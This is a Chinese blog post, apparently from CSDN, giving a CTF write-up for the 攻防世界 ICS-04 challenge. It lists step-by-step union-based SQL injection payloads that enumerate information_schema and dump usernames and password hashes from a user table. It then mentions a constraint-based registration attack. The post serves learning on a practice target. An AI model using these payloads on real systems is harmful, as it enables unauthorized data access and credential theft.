攻防世界ICS-04 writeup

最新推荐文章于 2023-02-22 10:36:46 发布
最新推荐文章于 2023-02-22 10:36:46 发布
阅读量586 收藏
点赞数 2
分类专栏: 渗透测试 CTF 随笔 文章标签: 安全 sql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a1004070060/article/details/105576215
版权
CTF 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
随笔
10 篇文章 0 订阅
订阅专栏
渗透测试
9 篇文章 1 订阅
订阅专栏

工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。

1.根据提示先去登录注册页面,注册一个账号,尝试登录后提示普通用户登录也没用,估计我们需要登录管理员账号。

2.因为我注册了root和admin两个账号,都可以顺利注册且是普通用户,所以推测管理员账号应该不是想让我们通过这么简单的方式猜出来。接着去密码找回页面寻找突破口,输入我们之前注册的账号admin,果然有bug……找回密码竟然还需要输入原始密码,我吐了。

3.尝试寻找一下注入点,最终发现用户名处存在注入,并且第三列为输出点。

admin' union select 1,2,3,4 limit 1,1#

4.接着进行进一步查询,过程中发现database()函数被禁用,于是构造如下SQL查询tablename

admin' union select 1,2,group_concat(table_name),4 from information_schema.tables where TABLE_SCHEMA!='information_schema'  limit 1,1#

 

5.查询user表列名

admin' union select 1,2,group_concat(column_name),4 from information_schema.columns where TABLE_NAME=0x75736572  limit 1,1#

6.查询一下管理员账号,无回显,判断可能user表不在当前数据库中

admin' union select 1,2,group_concat(username),4 from user  limit 1,1#

7.查询一下user表所在的数据库,可以看到user存在于cetc004数据库中

admin' union select 1,2,group_concat(table_schema),4 from information_schema.tables where table_name=0x75736572 limit 1,1#

8.查询管理员账号密码,这样就拿到了管理员账号,但是密码经过了哈希。

admin' union select 1,2,group_concat(username),4 from cetc004.user  limit 1,1#
admin' union select 1,2,group_concat(password),4 from cetc004.user  limit 1,1#

9.抱着侥幸心态试一下基于约束的注册注入,竟然成功了。。。

 

Void&Exists
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web漏洞挖掘快速入门1
08-08
3. 通过 zmpap 全网爆破查询真实 ip(可靠) 4. 子域名爆破,现在越来越不靠谱了 5. 通过扫描出网站测试文件如 phpinfo,test 等配置文
限制会话id服务端不共享_【干货分享】Web安全漏洞深入分析及其安全编码
weixin_39930276的博客
12-19 406
阅读:13,003超全Web漏洞详解及其对应的安全编码规则,包括:SQL注入、XSS、CSRF、文件上传、路径遍历、越权、XML以及业务安全等,实例告诉你各个漏洞对应的编码规则。给你的代码加把安全锁!一、Web安全基础1.1常见的Web安全漏洞1.2安全编码原则一切输入都是有害的!!!输出也不安全!输入:传参,cookie、session、http header、数据库……输出:异常信息、敏感...
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 xianzhi-2017-02-82239600 漏洞
ADummy的博客
02-24 761
ECShop 2.x / 3.x SQL注入/远程执行代码漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包—>脚本生成poc—>Burpsuite修改referer字段—>有回显 0x01漏洞介绍 ​ ECShop是一个B2C独立商店系统,供公司和个人快速建立个性化的在线商店。该系统是基于PHP语言和MYSQL数据库体系结构的跨平台开源程序。在2017年及之前的版本中,存在一个SQL注入漏洞,该漏洞可能会注入有效载荷并最终导致代码执行漏洞。最新版本的3.6.0
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞
ADummy的博客
03-03 331
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2019-7238) by ADummy 0x00利用路线 ​ ysoserial生成payload—>上传给网站进行解析—>命令执行 0x01漏洞介绍 ​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将
PostgreSQL 高权限命令执行漏洞 CVE-2019-9193 漏洞
ADummy的博客
03-07 493
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193) by ADummy 0x00利用路线 ​ 连接到数据库,直接命令执行 0x01漏洞介绍 ​ PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。 影响版本 PostgreSQL < 11 0x02漏洞现 环境启动后,将开启Postgres默认的5432端口,默认账号密码为postgres/pos
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
GKCTF2021-官方WriteUp.pdf
07-06
GKCTF2021-官方WriteUp.pdf
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
PML-Prediction-Assignment-Writeup
05-31
在本项目中,“PML-Prediction-Assignment-Writeup-main”可能包含用于建模的数据集。 2. 数据预处理:数据预处理是任何建模任务的关键步骤,包括数据清洗(处理缺失值和异常值)、数据转换(如归一化或标准化)...
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
Exp9 Web安全实践基础 20154328 常城
weixin_30509393的博客
05-23 227
Exp9 Web安全基础实践 一、基础问题回答 1. SQL注入攻击原理,如何防御? SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。 对于SQL注入攻击的防范,主要还是从代码上入手: 采用预编译语句集PreparedStatement,它内置了处理SQL注入的能力,只要使用它的setXXX方法传值即可。它的...
pwn漏洞挖掘技术之栈溢出
Sakura给爷pwn全场
05-17 530
说点题外话,推荐一本二进制漏洞挖掘奇书:《0day安全:软件漏洞分析技术》,这本书从技术到进阶讲了与漏洞挖掘有关的知识。如果要在ctf的pwn方向或者是在网络安全方向的二进制漏洞挖掘中有所提升,这本书一定要看。下面回归正题。 栈在内存中是以什么形式存在的?首先要对内存有一定的了解。内存按功能大致可划分为代码区、数据区、堆区、栈区。其中栈区是内存中功能执行的一部分。通常来说,栈的操作有两种,压栈(PUSH)和弹栈(POP),遵循后进先出的原则(Last In First Out,简称LIFO)。要挖掘栈溢出漏
Weblogic_文件读取弱口令漏洞
ADummy的博客
03-02 206
Weblogic 文件读取弱口令漏洞 by ADummy 0x00利用路线 ​ 后台弱口令、如果爆破不出来,可以用文件读取漏洞解密—>后台上传war包—>getshell 0x01漏洞介绍 ​ 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g) Java版本:1.6 0x02漏洞现 本环境存在弱口令: weblogic Oracle@123
uWSGI未经授权的访问漏洞 漏洞
ADummy的博客
03-04 316
uWSGI未经授权的访问漏洞 by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ uWSGI是一个Web应用程序服务器,它实现诸如WSGI / uwsgi / http之类的协议,并通过插件支持多种语言。就像Fastcgi一样,uwsgi不仅是应用程序名称,还是前端服务器和后端应用程序容器之间的交换标准。 uWSGI允许通过Magic Variables动态配置后端Web应用程序。如果端口暴露在外,攻击者可以构造uwsgi数据包并指定magic变量UWSGI_FILE,从
计算安全漏洞及其对策(四)
dzqxwzoe的博客
02-22 107
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。重点关注经批准的加固图像,这些图像会定期扫描安全风险和漏洞。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。不过我们这个水平也就算个渗透测试工程师,也就只能做个基础的安全服务,而这个领域还有很多业务,像攻防演练、等保测评、风险评估等,我们的能力根本不够看。
通过PUT方法的Tomcat任意写入文件漏洞 CVE-2017-12615 漏洞
ADummy的博客
02-25 375
通过PUT方法的Tomcat任意写入文件漏洞(CVE-2017-12615) by ADummy 0x00利用路线 ​ Burpsuite抓包—>发包—>写入shell—>命令执行 0x01漏洞介绍 ​ Tomcat设置了写许可权(readonly = false),这导致我们可以将文件写入服务器。 <servlet> <servlet-name>default</servlet-name> <servlet-class&
腾讯服务器漏洞怎么修,腾讯安全中心监测到微软披露的99个漏洞,win系统服务器用户尽快修...
weixin_42347873的博客
08-04 1659
近日,腾讯安全中心监测到微软于周二补丁日发布了2020年2月安全补丁更新公告,一共披露了99 个漏洞,其中12个漏洞评级为”严重”级别,攻击者可利用漏洞进行本地权限提升、远程代码执行等攻击。为避免您的业务受影响,腾讯安全中心建议您及时开展安全自查,如在受影响范围,请您及时进行更新修,避免被外部攻击者入侵。建议您在安装补丁前做好数据备份工作,避免出现意外。【漏洞详情】1、Internet Ex...
值得收藏的网站----安全
xinshouxiaocainiao的博客
12-27 6315
值得收藏的网站---------安全圈info 官网地址:http://www.anquanquan.info/ 严选 最近推荐 Web安全微专业四期安全技能树简版硬创公开课雷锋网找回你暗木马查杀号安匠迪代码安全审查 恶意代码家族样本高精度
ctf show-web入门 SSTI篇部分题解
volcano的博客
02-04 3952
ctfshowSSTIweb361web362web363request.args传参绕过web364chr()绕过web365中括号绕过web366attr获取变量request.cookies传参web367web368 SSTI ssti模板注入基本原理推荐看这篇文章,这个师傅写的很详细,小白也很容易看懂。 web361 这个hackbar挺好用的,有现成模板,当前目录只有一个app.py,我们看一下上级目录 ?name={{ config.__class__.__init__.__globals_
攻防世界shuffle
最新发布
09-03
- *3* [攻防世界Reverse进阶区-Shuffle-writeup](https://blog.csdn.net/qq_35056292/article/details/108676766)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值